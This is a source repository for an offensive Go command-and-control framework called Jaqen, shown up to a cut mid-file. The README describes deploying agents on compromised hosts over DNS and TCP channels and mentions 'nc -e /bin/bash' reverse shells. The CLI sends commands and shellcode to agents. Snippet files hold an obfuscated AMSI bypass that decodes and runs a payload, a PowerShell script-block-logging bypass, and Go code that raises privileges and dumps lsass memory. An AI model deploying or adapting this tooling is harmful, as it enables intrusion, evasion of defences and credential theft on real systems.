├── .gitignore
├── Jaqen.go
├── Readme.md
├── cli
    ├── Readme.md
    ├── cli.go
    └── state.go
├── libJaqen
    ├── agent
    │   ├── HandySnippets
    │   │   ├── amsibypass.ps1
    │   │   ├── scriptblockbypass.ps1
    │   │   └── unhook
    │   │   │   └── unhook.go
    │   ├── agent.go
    │   └── exec
    │   │   ├── shellcode.go
    │   │   └── shellcode_windows.go
    └── server
    │   ├── agentGeneration.go
    │   ├── interface.go
    │   ├── listeners
    │       ├── dnsListener
    │       │   ├── bashdnsagent.sh
    │       │   ├── dns.go
    │       │   ├── dnsagent.go
    │       │   ├── dnsagent.ps1
    │       │   └── dnscommandManager.go
    │       ├── encryptedDNSListener
    │       │   ├── encryptedDNS.go
    │       │   ├── encryptedDNSAgent.go
    │       │   ├── encryptedDNSAgent.ps1
    │       │   └── encryptedDNSCommandManager.go
    │       └── tcpListener
    │       │   ├── agent.go
    │       │   ├── tcp.go
    │       │   └── tcpAgent.go
    │   ├── server.go
    │   └── util
    │       └── util.go
└── test
    └── crypto_test.go


/.gitignore:
--------------------------------------------------------------------------------
1 | logs.txt
2 | dev


--------------------------------------------------------------------------------
/Jaqen.go:
--------------------------------------------------------------------------------
 1 | package main
 2 | 
 3 | import (
 4 | 	"math/rand"
 5 | 	"time"
 6 | 
 7 | 	//_ "net/http/pprof"
 8 | 
 9 | 	"github.com/c-sto/Jaqen/cli"
10 | 	"github.com/fatih/color"
11 | )
12 | 
13 | func main() {
14 | 
15 | 	color.New().Println(`....''.....'''''''''''''......'''''';o0KK00OOOkkkk
16 | ''''''''''''''''..'...'''''''''''''';oOKK00OOOOkkk
17 | .'''''''''''''''........'''...'''..';oOKK0OOOOOOkk
18 | ..........''''.....'''''.......'''..,oOKK0OOOOOOOO
19 | ............... 'lxkkkkxolc,...,,,'..:k000OOOOOOOO
20 | .............. .lxkkOOkkdddc'...'','..lO00OOOOOOOO
21 | .............  'loddxxxxdddo;. ...';'..oOOOkOOOkkO
22 | ...''''......  'lodxxdddoool;.  ...,;..'dOOOOOkkkk
23 | ''''''''''...  .;;;col:,;;;,..  .''.,'..,dOOOOkkkk
24 | ''''''''''..   .''.cxo:,;:;'..  .';;;;'..;xOOkkxxx
25 | ''''''''''..   .;:lkkxolllooo:. ..,:::;...lkOOkxdx
26 | ''''''''''..   .:lodxdodxxxdoc....;cl:,...'dOkkxdd
27 | '''..'''''..    'cc;;:lodddol;...':ld:.....ckkkxdd
28 | '''''...'...    .;;,,;::clll;'..';:od:'...'lkOOkxd
29 | ''''''''....     .;;,;ccllc;,...,,,:ll::'.,lxkOkxd
30 | '''''''''...      .;:clllc:,....',,'':ll:,,:lxkkxd
31 | ''''',,''''...     .',;,'.........'..,ll;,:ccdkkxx
32 | ,,',,,,,'''....      .''..'',,..  .'..',,,:odxkxxd
33 | '''''',,,,'...       .,:::c:;,'. .....,cxkOOOkxxdo
34 | .'''''''''''....    ..';::::,,,.. .':okO00KKK0Okxo
35 | '',,,,''........  ..',,,;;;::;;:;;cdkO000000KKK0ko
36 | ',;;;;,,''........'';;;;::cc::cllodxkOO0KKKKKKKKKk
37 | ,,;;;;;,,'''''',;;;::;::ccc:clclooxkkkkOO00KKXXKKK
38 | ',,,,,;,,'',,,,cocc::cccc::lolooooc:;,;;::cok0KKKK
39 | ',,,',,,,''',,:odoccccclccldodoc;...'';;,''';lOKKK`)
40 | 	color.New().Println(randomQuote())
41 | 
42 | 	cli.Shell()
43 | 
44 | }
45 | 
46 | func randomQuote() string {
47 | 	rand.Seed(time.Now().UnixNano())
48 | 	q := []string{
49 | 		"Valar morghulis",
50 | 	}
51 | 	return q[rand.Intn(len(q))]
52 | }
53 | 


--------------------------------------------------------------------------------
/Readme.md:
--------------------------------------------------------------------------------
 1 | # Jaqen
 2 | 
 3 | Extensible Golang C2. Primary focus is using novel C2 channels.
 4 | 
 5 | ## Installation
 6 | 
 7 | Minimum Go version of 1.10 (may work on earlier versions too I guess)
 8 | 
 9 | ```
10 | go get -u github.com/c-sto/jaqen
11 | ```
12 | 
13 | Alternatively:
14 | 
15 | ```
16 | cd $GOPATH/src/github.com/
17 | mkdir c-sto
18 | cd c-sto
19 | git clone https://github.com/c-sto/Jaqen
20 | cd Jaqen
21 | go get .
22 | go run Jaqen.go
23 | ```
24 | 
25 | ## Usage
26 | 
27 | Create a listener, set the listener settings, and generate an agent to deploy onto your already compromised host.
28 | 
29 | There are two listeners included - DNS and TCP. Additional listeners will be added in time, but they are intended to only be a template. Successful red teaming will require custom listeners/agents to achieve objectives. Basic AV evasion techniques are displayed in the DNS golang agent.
30 | 
31 | ### DNS
32 | 
33 | To set a DNS listener, you must have the ability to set records for the domain of choice.
34 | 
35 | - Set an A record pointing to the server you are running the jaqen listener on. This must be an externally accessible location, as it's likely that intermediate nameservers will be querying rather than the client (`c1.supershady.ru -> 8.8.8.8`)
36 | - Set a NS record pointing to the A record (`c2.supershady.ru -> c1.supershady.ru`)
37 | - Set the 'domain' setting on the listener to the NS record (`set domain c2.supershady.ru`)
38 | 
39 | **IMPORTANT NOTE** Using the default DNS listener, all traffic is _unencryped_ and will be traversing across potentially uncontrolled networks. The responses are literally just hex encoded and smashed onto a subdomain. Stay tuned for an encrypted version. Please don't send/receive anything sensitive over this channel.
40 | 
41 | ## Custom Listener
42 | 
43 | The listener plugs into the main C2 that you control via the CLI. The listener simply has to conform to the 'Listener' interface. The interface can be seen in the [interface](libJaqen/server/interface.go) source file. Any 'struct' type that implements every one of the functions defined in the interface will conform to the interface, and you will be able to add it to the [cli](cli/cli.go) file.
44 | 
45 | ### Events
46 | 
47 | Events are passed back to the cli/server via channels - they are defined in the [interface](libJaqen/server/interface.go) file. The bare minimum required is to pass a uid back to the cli on checkin, and ideally some sort of response confirmation if a command has been executed, but the only limit is your creativity. Checkins _can_ have extra data (OS, agent type etc), but the only required field is the UID. Listeners handle their own agent UID's.
48 | 
49 | ### Agents
50 | 
51 | Agents can do whatever you'd like. The DNS listener has bash, powershell, and golang agents provided as an example of how flexible it can be. The TCP listener can be used by simply sending a regular revese shell back (`metasploit shell_reverse_tcp`, `nc -e /bin/bash`, etc). Templating is encouraged to allow settings to be passed to agents. See the DNS listener for examples.
52 | 
53 | 
54 | ## Thanks
55 | 
56 | Inspiration for this was taken from merlin, http/2 c2 built by Ne0nD0g. Please go and look at it, it's very good.
57 | https://github.com/Ne0nD0g/merlin
58 | 
59 | Thanks to all the 'beta' testers at Hivint, Asterisk and Bishop Fox. Putting up with my janky on the spot 'please git pull now' fixes is the most hacker thing anyone can do.


--------------------------------------------------------------------------------
/cli/Readme.md:
--------------------------------------------------------------------------------
 1 | # Server CLI
 2 | 
 3 | Basic structure (intend to update this, but it will probably get left l0l) (x indicates done/working)
 4 | 
 5 | ```
 6 | Main
 7 | |-Exit (Exits the Server, shuts down agents etc) X
 8 | |
 9 | |-Listeners (Listener management) X
10 | |   |-Create (Add new listener) X
11 | |   |-Interact <listener> (Edit selected listener)
12 | |   |       |-Add (Add listener to list)
13 | |   |       |-Set (Set options)
14 | |   |       |-Show (Show options)
15 | |   |       |-Start (Start and add to list)
16 | |   |       |-Back (don't add to list)
17 | |   |-Delete (Delete current listener)
18 | |   |-Show (Show current listeners)
19 | |   |-Stop (Stop listener)
20 | |
21 | |-Agents (Agent Management) X
22 | |   |-Show (Show current agents) X
23 | |   |-Generate (Create an agent(undecided if this should be a feature))
24 | |   |   |-Set (Set options)
25 | |   |   |-Show [options/info]
26 | |   |   |-Generate
27 | |   |-Set (set agent options, output location etc)
28 | |   |-Interact (Interact with an agent) X
29 | |   |   |-Exec (command execution) X
30 | |   |   |   |-Send command (Send a command to an agent)
31 | |   |   |   |-Send shellcode (Send shellcode to an agent)
32 | |   |   |-Show output (Show log of agent historic output)
33 | |   |   |-Kill (Kill the agent)
34 | |   |-Back
35 | |
36 | |-Version (Version info) X
37 | |-Status (Show current agents, current listeners)
38 | ```


--------------------------------------------------------------------------------
/cli/cli.go:
--------------------------------------------------------------------------------
  1 | package cli
  2 | 
  3 | import (
  4 | 	"fmt"
  5 | 	"os"
  6 | 	"strings"
  7 | 
  8 | 	//. "github.com/c-sto/Jaqen"
  9 | 	"github.com/c-sto/Jaqen/libJaqen/server"
 10 | 	"github.com/c-sto/Jaqen/libJaqen/server/listeners/dnsListener"
 11 | 	"github.com/c-sto/Jaqen/libJaqen/server/listeners/encryptedDNSListener"
 12 | 	"github.com/c-sto/Jaqen/libJaqen/server/listeners/tcpListener"
 13 | 	"github.com/c-sto/readline"
 14 | 	"github.com/fatih/color"
 15 | )
 16 | 
 17 | var state cliState
 18 | 
 19 | var definedListeners = map[string]server.Listener{
 20 | 	//add listener here once written
 21 | 	"dns":        &dnsListener.JaqenDNSListener{},
 22 | 	"secure-dns": &encryptedDNSListener.JaqenEncryptedDNSListener{},
 23 | 	"tcp":        &tcpListener.JaqenTCPListener{},
 24 | }
 25 | 
 26 | func DoTest() {
 27 | 	/*
 28 | 		l := dnsListener.JaqenDNSListener{}
 29 | 		state.localServer.AddListener(&l)
 30 | 		//fmt.Println(s.GetOptions("dns")("""))
 31 | 		state.localServer.SetOption("dns", "domain", "c2.supershady.ru")
 32 | 		fmt.Println(state.localServer.GetOption("dns", "domain"))
 33 | 		fmt.Println(state.localServer.Start("dns"))
 34 | 		state.localServer.GenerateAgent("dns", "powershell")
 35 | 		state.selectedListener = "dns"
 36 | 		state.SetContext("listenerinteract", "Listeners>Interact[dns]")
 37 | 	*/
 38 | 	/*
 39 | 		t := tcpListener.JaqenTCPListener{}
 40 | 		state.localServer.AddListener(&t)
 41 | 		state.localServer.SetOption("tcp", "port", "4444")
 42 | 		state.localServer.Start("tcp")
 43 | 		//*/
 44 | }
 45 | 
 46 | func printVersion() string {
 47 | 
 48 | 	return "0.0.2"
 49 | }
 50 | 
 51 | func printStatus() string {
 52 | 	return "NO"
 53 | }
 54 | 
 55 | // Shell is the exported function to start the command line interface
 56 | func Shell() {
 57 | 
 58 | 	state = cliState{}.New()
 59 | 	state.SetContext("main", "")
 60 | 
 61 | 	DoTest()
 62 | 
 63 | 	defer state.CloseReadline()
 64 | 
 65 | 	for {
 66 | 		line, err := state.ReadLine() // rl.Readline()
 67 | 		if err != nil {
 68 | 			break
 69 | 		}
 70 | 		if len(line) < 1 {
 71 | 			continue
 72 | 		}
 73 | 		line = strings.TrimSpace(line)
 74 | 
 75 | 		cmd := strings.Fields(line)
 76 | 		keyVal := strings.ToLower(cmd[0])
 77 | 		switch strings.ToLower(state.GetContext()) {
 78 | 		case "main":
 79 | 			switch keyVal {
 80 | 			case "exit":
 81 | 				exit()
 82 | 			case "listeners":
 83 | 				state.SetContext("Listeners", "Listeners")
 84 | 			case "agents":
 85 | 				state.SetContext("Agents", "Agents")
 86 | 			case "version":
 87 | 				printVersion()
 88 | 			case "status":
 89 | 				printStatus()
 90 | 			}
 91 | 		case "listeners":
 92 | 			switch keyVal {
 93 | 			case "create":
 94 | 				state.SetContext("listenercreate", "Listeners>Create")
 95 | 			case "interact":
 96 | 				//require more than 0 args
 97 | 				if len(cmd) != 2 {
 98 | 					fmt.Println("Interact <listener>")
 99 | 					continue
100 | 				}
101 | 				state.selectedListener = cmd[1]
102 | 				state.SetContext("listenerinteract", fmt.Sprintf("Listeners>Interact[%s]", yellow(state.selectedListener)))
103 | 			case "delete":
104 | 				if len(cmd) > 1 {
105 | 					state.localServer.RemoveListener(cmd[1])
106 | 				}
107 | 			case "show":
108 | 				//get all listeners
109 | 				x := state.localServer.GetListeners()
110 | 				for _, y := range x {
111 | 					opts := ""
112 | 					for k, v := range y.Options {
113 | 						opts += fmt.Sprintf(" %s=%s", k, v)
114 | 					}
115 | 					fmt.Printf("Name: %s Running: %v Options: %s\n", y.Name, y.Running, opts)
116 | 				}
117 | 			case "stop":
118 | 				if len(cmd) > 1 {
119 | 					//todo: check listener exists
120 | 					state.localServer.StopListener(cmd[1])
121 | 				}
122 | 			case "back":
123 | 				state.SetContext("main", "")
124 | 			}
125 | 		case "listenercreate": //select listener to create (select listener type)
126 | 			switch keyVal {
127 | 			default:
128 | 				if _, ok := definedListeners[keyVal]; ok {
129 | 					state.selectedListenerType = keyVal
130 | 					state.tempListener = definedListeners[keyVal]
131 | 
132 | 					n, e := state.localServer.AddListener(state.tempListener)
133 | 					if e != nil {
134 | 						fmt.Println(e)
135 | 					}
136 | 					state.tempListener = nil
137 | 					state.selectedListener = n
138 | 					state.SetContext("listenerinteract", fmt.Sprintf("Listeners>Interact[%s]", yellow(state.selectedListener)))
139 | 				}
140 | 			case "back":
141 | 				state.SetContext("Listeners", "Listeners")
142 | 			}
143 | 
144 | 		case "listenerinteract":
145 | 			switch keyVal {
146 | 			case "start":
147 | 				e := state.localServer.Start(state.selectedListener)
148 | 				if e != nil {
149 | 					fmt.Println(e)
150 | 				}
151 | 			case "info":
152 | 				x, _ := state.localServer.GetOptions(state.selectedListener)
153 | 				fmt.Println(x("")) //wow this is hella gross.
154 | 			case "set":
155 | 				if len(cmd) == 3 {
156 | 					state.localServer.SetOption(state.selectedListener, strings.ToLower(cmd[1]), cmd[2])
157 | 				} else {
158 | 					fmt.Println("Require 3 arguments: Set <option> <value>")
159 | 					continue
160 | 				}
161 | 			case "generate":
162 | 				if len(cmd) > 1 {
163 | 					fmt.Println(string(state.localServer.GenerateAgent(state.selectedListener, strings.ToLower(cmd[1]))))
164 | 				} else {
165 | 
166 | 				}
167 | 			case "back":
168 | 				state.tempListener = nil
169 | 				state.selectedListener = ""
170 | 				state.SetContext("listeners", "Listeners")
171 | 			}
172 | 
173 | 		case "agents":
174 | 			switch keyVal {
175 | 			case "show":
176 | 				fmt.Println(getAgents(""))
177 | 			case "set":
178 | 				//todo: this (enable writing to local file for agent output)
179 | 			case "interact":
180 | 				if len(cmd) < 2 {
181 | 					fmt.Println("Interact <agent>")
182 | 					continue
183 | 				}
184 | 				al := getAgents("")
185 | 				for x := range al {
186 | 					if al[x] == cmd[1] {
187 | 						state.SelectedAgent = cmd[1]
188 | 						state.SetContext("agentinteract", fmt.Sprintf("Agents>Interact[%s]", yellow(state.SelectedAgent)))
189 | 						continue
190 | 					}
191 | 				}
192 | 				if state.GetContext() != "agentinteract" {
193 | 					fmt.Println("Agent not found")
194 | 				}
195 | 			case "back":
196 | 				state.SetContext("main", "")
197 | 			}
198 | 		case "agentset":
199 | 			//todo: this
200 | 		case "agentinteract":
201 | 			switch keyVal {
202 | 			case "set":
203 | 				if len(cmd) > 1 {
204 | 					switch strings.ToLower(cmd[1]) {
205 | 					case "alias":
206 | 						//todo: check agent exists gracefully
207 | 						//todo: show error output for bad cmds
208 | 						if len(cmd) > 3 {
209 | 							state.SetAlias(cmd[2], cmd[3])
210 | 							state.SelectedAgent = cmd[3]
211 | 							state.SetContext("agentinteract", fmt.Sprintf("Agents>Interact[%s]", yellow(state.SelectedAgent)))
212 | 						}
213 | 					}
214 | 				}
215 | 			case "exec":
216 | 				if len(cmd) == 1 {
217 | 					state.SetContext("interactexec", fmt.Sprintf("Agents>Interact[%s]>%s", yellow(state.SelectedAgent), red("Exec")))
218 | 				} else {
219 | 					state.AgentExecute(state.SelectedAgent, strings.Join(cmd[1:], " "))
220 | 				}
221 | 			case "kill":
222 | 				if len(cmd) > 1 {
223 | 					state.localServer.AgentKill(cmd[1])
224 | 				}
225 | 			case "back":
226 | 				state.SetContext("Agents", "Agents")
227 | 			}
228 | 		case "interactexec":
229 | 			switch keyVal {
230 | 			default:
231 | 				state.AgentExecute(state.SelectedAgent, strings.Join(cmd[:], " "))
232 | 			case "back":
233 | 				state.SetContext("agentinteract", fmt.Sprintf("Agents>Interact[%s]", yellow(state.SelectedAgent)))
234 | 			}
235 | 
236 | 		default:
237 | 			fmt.Println(keyVal)
238 | 			fmt.Println(strings.ToLower(state.GetContext()))
239 | 			//help?
240 | 		}
241 | 	}
242 | }
243 | 
244 | var red = color.New(color.FgRed).SprintfFunc()
245 | var yellow = color.New(color.FgYellow).SprintfFunc()
246 | 
247 | func getCompleter(completer string) *readline.PrefixCompleter {
248 | 
249 | 	switch strings.ToLower(completer) {
250 | 	case "main":
251 | 		return readline.NewPrefixCompleter(
252 | 			readline.PcItem("Listeners"),
253 | 			readline.PcItem("Agents"),
254 | 			readline.PcItem("Status"),
255 | 			readline.PcItem("Version"),
256 | 			readline.PcItem("Exit"),
257 | 		)
258 | 	case "listeners":
259 | 		return readline.NewPrefixCompleter(
260 | 			readline.PcItem("Create"),
261 | 			readline.PcItem("Show"),
262 | 			readline.PcItem("Interact",
263 | 				readline.PcItemDynamic(state.ListListeners),
264 | 			),
265 | 			readline.PcItem("Stop",
266 | 				readline.PcItemDynamic(state.ListListeners),
267 | 			),
268 | 			readline.PcItem("Delete"),
269 | 			readline.PcItem("Back"),
270 | 		)
271 | 	case "agents":
272 | 		return readline.NewPrefixCompleter(
273 | 			readline.PcItem("Show"),
274 | 			readline.PcItem("Interact",
275 | 				readline.PcItemDynamic(getAgents),
276 | 			),
277 | 			readline.PcItem("Kill",
278 | 				readline.PcItemDynamic(getAgents),
279 | 			),
280 | 			readline.PcItem("Back"),
281 | 		)
282 | 	case "agentinteract":
283 | 		return readline.NewPrefixCompleter(
284 | 			readline.PcItem("Exec"),
285 | 			readline.PcItem("Show"),
286 | 			readline.PcItem("Set",
287 | 				readline.PcItem("Alias", readline.PcItemDynamic(getAgents)),
288 | 				readline.PcItem("OutLocation", readline.PcItem("Stdout"), readline.PcItem("File")),
289 | 			),
290 | 			readline.PcItem("Kill"),
291 | 			readline.PcItem("Back"),
292 | 		)
293 | 	case "listenercreate":
294 | 		return readline.NewPrefixCompleter(
295 | 			readline.PcItemDynamic(getDefinedListeners),
296 | 			readline.PcItem("Back"),
297 | 		)
298 | 	case "listenerinteract":
299 | 		x, e := state.localServer.GetOptions(state.selectedListener)
300 | 		if e != nil {
301 | 			x = func(string) []string {
302 | 				return []string{}
303 | 			}
304 | 		}
305 | 		return readline.NewPrefixCompleter(
306 | 			readline.PcItem("Start"),
307 | 			readline.PcItem("Info"),
308 | 			readline.PcItem("Set",
309 | 				readline.PcItemDynamic(x),
310 | 			),
311 | 			readline.PcItem("Generate",
312 | 				readline.PcItemDynamic(getAgentGenerateFormats(state.selectedListener)),
313 | 			),
314 | 			readline.PcItem("Restart"),
315 | 			readline.PcItem("Back"),
316 | 		)
317 | 
318 | 	}
319 | 	return readline.NewPrefixCompleter(
320 | 		readline.PcItem("Listeners"),
321 | 		readline.PcItem("Agents"),
322 | 		readline.PcItem("Status"),
323 | 		readline.PcItem("Version"),
324 | 		readline.PcItem("Exit"),
325 | 	)
326 | }
327 | 
328 | func getAgents(string) []string {
329 | 	a := state.localServer.GetAgents()("")
330 | 	//don't show any aliased agents
331 | 	o := []string{}
332 | 	for _, x := range a {
333 | 		if v, ok := state.agentToAlias[x]; ok {
334 | 			o = append(o, v)
335 | 		} else {
336 | 			o = append(o, x)
337 | 		}
338 | 	}
339 | 	return o
340 | }
341 | 
342 | func getAgentGenerateFormats(l string) func(string) []string {
343 | 
344 | 	r := func(string) []string {
345 | 		re := []string{}
346 | 		for _, x := range state.localServer.GetAgentFormats(l) {
347 | 			re = append(re, x)
348 | 		}
349 | 		return re
350 | 	}
351 | 	return r
352 | }
353 | 
354 | func getDefinedListeners(string) []string {
355 | 	r := []string{}
356 | 	for k := range definedListeners {
357 | 		r = append(r, k)
358 | 	}
359 | 	return r
360 | }
361 | 
362 | func exit() {
363 | 	os.Exit(0)
364 | }
365 | 


--------------------------------------------------------------------------------
/cli/state.go:
--------------------------------------------------------------------------------
  1 | package cli
  2 | 
  3 | import (
  4 | 	"io"
  5 | 	"strings"
  6 | 	"sync"
  7 | 
  8 | 	"github.com/c-sto/Jaqen/libJaqen/server"
  9 | 	"github.com/chzyer/readline"
 10 | )
 11 | 
 12 | type cliState struct {
 13 | 	context      string
 14 | 	ContextMutex *sync.RWMutex
 15 | 	prompt       *readline.Instance
 16 | 	localServer  *server.JaqenServer
 17 | 
 18 | 	SelectedAgent string
 19 | 
 20 | 	outReader            chan server.Output
 21 | 	selectedListener     string //actual name of listener ("dns:asdf" etc)
 22 | 	selectedListenerType string //type of listener ("dns" etc)
 23 | 	tempListener         server.Listener
 24 | 
 25 | 	agentToAlias map[string]string
 26 | 	aliasToAgent map[string]string
 27 | 	aliasMutex   *sync.RWMutex
 28 | }
 29 | 
 30 | func (s cliState) GetContext() string {
 31 | 	s.ContextMutex.RLock()
 32 | 	defer s.ContextMutex.RUnlock()
 33 | 	return s.context
 34 | }
 35 | 
 36 | func (s *cliState) SetContext(c, prompt string) {
 37 | 	s.ContextMutex.Lock()
 38 | 	defer s.ContextMutex.Unlock()
 39 | 	s.context = c
 40 | 	s.prompt.SetPrompt(prompt + "> ")
 41 | 	s.prompt.Config.AutoComplete = getCompleter(strings.ToLower(c))
 42 | }
 43 | 
 44 | func (s *cliState) SetServer(srv *server.JaqenServer) {
 45 | 	s.ContextMutex.Lock()
 46 | 	defer s.ContextMutex.Unlock()
 47 | 	s.localServer = srv
 48 | }
 49 | 
 50 | func (s cliState) New() cliState {
 51 | 	c := cliState{
 52 | 		//Context:      "main",
 53 | 		ContextMutex: &sync.RWMutex{},
 54 | 		//prompt * readline.Instance,
 55 | 	}
 56 | 	ls := server.JaqenServer{}
 57 | 	ls.Init()
 58 | 	c.SetServer(&ls)
 59 | 
 60 | 	rl, err := readline.NewEx(&readline.Config{
 61 | 		Prompt:            "> ",
 62 | 		HistoryFile:       "logs.txt",
 63 | 		InterruptPrompt:   "^C",
 64 | 		EOFPrompt:         "exit",
 65 | 		AutoComplete:      getCompleter("main"),
 66 | 		HistorySearchFold: true,
 67 | 	})
 68 | 	if err != nil {
 69 | 		panic(err)
 70 | 	}
 71 | 
 72 | 	c.aliasToAgent = make(map[string]string)
 73 | 	c.agentToAlias = make(map[string]string)
 74 | 	c.aliasMutex = &sync.RWMutex{}
 75 | 
 76 | 	c.SetPromptFullConfig(rl)
 77 | 	c.SetContext("main", "")
 78 | 
 79 | 	c.outReader = c.localServer.GetOutputChan()
 80 | 	go c.StartOutReader()
 81 | 
 82 | 	return c
 83 | }
 84 | 
 85 | func (s *cliState) AgentExecute(sa, cmd string) {
 86 | 	if a, ok := s.aliasToAgent[sa]; ok {
 87 | 		s.localServer.AgentExecute(a, cmd)
 88 | 	} else {
 89 | 		s.localServer.AgentExecute(sa, cmd)
 90 | 	}
 91 | }
 92 | 
 93 | func (s *cliState) SetAlias(agent, alias string) error {
 94 | 	s.aliasMutex.Lock()
 95 | 	defer s.aliasMutex.Unlock()
 96 | 
 97 | 	//todo: confirm they exist
 98 | 	//todo: confirm no overwrite
 99 | 	s.agentToAlias[agent] = alias
100 | 	s.aliasToAgent[alias] = agent
101 | 
102 | 	return nil
103 | }
104 | 
105 | func (s cliState) ListListeners(string) []string {
106 | 	r := []string{}
107 | 
108 | 	for _, x := range s.localServer.GetListeners() {
109 | 		r = append(r, x.Name)
110 | 	}
111 | 	return r
112 | }
113 | 
114 | func (s *cliState) StartOutReader() {
115 | 	//green := color.New(color.FgGreen).SprintFunc()
116 | 	for {
117 | 		select {
118 | 		case outLine := <-s.outReader:
119 | 			io.WriteString(s.prompt.Stdout(), outLine.Val+"\n")
120 | 		}
121 | 	}
122 | }
123 | 
124 | func (s *cliState) SetPromptFullConfig(i *readline.Instance) {
125 | 	s.prompt = i
126 | }
127 | 
128 | func (s *cliState) CloseReadline() {
129 | 	s.prompt.Close()
130 | }
131 | 
132 | func (s *cliState) ReadLine() (string, error) {
133 | 	return s.prompt.Readline()
134 | }
135 | 


--------------------------------------------------------------------------------
/libJaqen/agent/HandySnippets/amsibypass.ps1:
--------------------------------------------------------------------------------
1 | #AMSI Bypass as per bloodhound slack aggressor chat (probably cobbr)
2 | 
3 | [Ref].Assembly.GetType("System.Man"+"agement.Aut"+"omatio"+"n.Ams"+"iUtils").GetField("ams"+"iInitFai"+"led","NonP"+"ublic,St"+"atic").SetValue($null,$true); [Text.Encoding]::UTF8.GetString([Convert]:FromBase64String("{{.ENCODED_PAYLOAD}}")) | iex;


--------------------------------------------------------------------------------
/libJaqen/agent/HandySnippets/scriptblockbypass.ps1:
--------------------------------------------------------------------------------
 1 | # https://gist.github.com/cobbr/d8072d730b24fbae6ffe3aed8ca9c407
 2 | # @cobbr_io
 3 | 
 4 | $GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
 5 | If ($GroupPolicyField) {
 6 |     $GroupPolicyCache = $GroupPolicyField.GetValue($null)
 7 |     If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
 8 |         $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
 9 |         $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
10 |     }
11 |     $val = [System.Collections.Generic.Dictionary[string,System.Object]]::new()
12 |     $val.Add('EnableScriptB'+'lockLogging', 0)
13 |     $val.Add('EnableScriptB'+'lockInvocationLogging', 0)
14 |     $GroupPolicyCache['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging'] = $val
15 | }


--------------------------------------------------------------------------------
/libJaqen/agent/HandySnippets/unhook/unhook.go:
--------------------------------------------------------------------------------
  1 | package main
  2 | 
  3 | import (
  4 | 	"fmt"
  5 | 	"io/ioutil"
  6 | 	"syscall"
  7 | 	"unsafe"
  8 | )
  9 | 
 10 | func minidump(pid, proc int) {
 11 | 	/*
 12 | 		BOOL MiniDumpWriteDump(
 13 | 		  HANDLE                            hProcess,
 14 | 		  DWORD                             ProcessId,
 15 | 		  HANDLE                            hFile,
 16 | 		  MINIDUMP_TYPE                     DumpType,
 17 | 		  PMINIDUMP_EXCEPTION_INFORMATION   ExceptionParam,
 18 | 		  PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam,
 19 | 		  PMINIDUMP_CALLBACK_INFORMATION    CallbackParam
 20 | 		);
 21 | 	*/
 22 | 
 23 | 	k32 := syscall.NewLazyDLL("Dbgcore.dll")
 24 | 	m := k32.NewProc("MiniDumpWriteDump")
 25 | 	f, e := ioutil.TempFile("./", "")
 26 | 	if e != nil {
 27 | 		panic(e)
 28 | 	}
 29 | 	stdOutHandle := f.Fd()
 30 | 	r, _, _ := m.Call(ptr(proc), ptr(pid), stdOutHandle, 3, 0, 0, 0)
 31 | 	if r != 0 {
 32 | 		fmt.Println("Successfully dumped lsass, wrote dump to ", f.Name())
 33 | 	}
 34 | }
 35 | 
 36 | func getProcID(procname string) uint32 {
 37 | 	//https://github.com/mitchellh/go-ps/blob/master/process_windows.go
 38 | 
 39 | 	handle, err := syscall.CreateToolhelp32Snapshot(
 40 | 		0x00000002,
 41 | 		0)
 42 | 	if handle < 0 {
 43 | 		fmt.Println("handle 0 or lower?")
 44 | 		return 0
 45 | 	}
 46 | 	defer syscall.CloseHandle(handle)
 47 | 
 48 | 	var entry syscall.ProcessEntry32
 49 | 	entry.Size = uint32(unsafe.Sizeof(entry))
 50 | 	err = syscall.Process32First(handle, &entry)
 51 | 	if err != nil {
 52 | 		fmt.Println(err)
 53 | 		return 0
 54 | 	}
 55 | 
 56 | 	for {
 57 | 		s := ""
 58 | 		for _, chr := range entry.ExeFile {
 59 | 			if chr != 0 {
 60 | 				s = s + string(int(chr))
 61 | 			}
 62 | 		}
 63 | 		if s == procname {
 64 | 			return entry.ProcessID
 65 | 		}
 66 | 		err = syscall.Process32Next(handle, &entry)
 67 | 		if err != nil {
 68 | 			break
 69 | 		}
 70 | 	}
 71 | 	fmt.Println("Couldn't find process..")
 72 | 	return 0
 73 | }
 74 | 
 75 | func setPrivilege(s string, b bool) bool {
 76 | 	type LUID struct {
 77 | 		LowPart  uint32
 78 | 		HighPart int32
 79 | 	}
 80 | 	type LUID_AND_ATTRIBUTES struct {
 81 | 		Luid       LUID
 82 | 		Attributes uint32
 83 | 	}
 84 | 	type TOKEN_PRIVILEGES struct {
 85 | 		PrivilegeCount uint32
 86 | 		Privileges     [1]LUID_AND_ATTRIBUTES
 87 | 	}
 88 | 
 89 | 	modadvapi32 := syscall.NewLazyDLL("advapi32.dll")
 90 | 	//kernel32 := syscall.NewLazyDLL("kernel32.dll")
 91 | 	procAdjustTokenPrivileges := modadvapi32.NewProc("AdjustTokenPrivileges")
 92 | 
 93 | 	procLookupPriv := modadvapi32.NewProc("LookupPrivilegeValueW")
 94 | 	var tokenHandle syscall.Token
 95 | 	thsHandle, err := syscall.GetCurrentProcess()
 96 | 	if err != nil {
 97 | 		panic(err)
 98 | 	}
 99 | 	syscall.OpenProcessToken(
100 | 		//r, a, e := procOpenProcessToken.Call(
101 | 		thsHandle,                       //  HANDLE  ProcessHandle,
102 | 		syscall.TOKEN_ADJUST_PRIVILEGES, //	DWORD   DesiredAccess,
103 | 		&tokenHandle,                    //	PHANDLE TokenHandle
104 | 	)
105 | 	var luid LUID
106 | 	r, a, e := procLookupPriv.Call(
107 | 		ptr(0),                         //LPCWSTR lpSystemName,
108 | 		ptr(s),                         //LPCWSTR lpName,
109 | 		uintptr(unsafe.Pointer(&luid)), //PLUID   lpLuid
110 | 	)
111 | 	fmt.Println("lookuppriv:", r, a, e)
112 | 	SE_PRIVILEGE_ENABLED := uint32(0x00000002)
113 | 	privs := TOKEN_PRIVILEGES{}
114 | 	privs.PrivilegeCount = 1
115 | 	privs.Privileges[0].Luid = luid
116 | 	privs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED
117 | 	//AdjustTokenPrivileges(hToken, false, &priv, 0, 0, 0)
118 | 	r, a, e = procAdjustTokenPrivileges.Call(
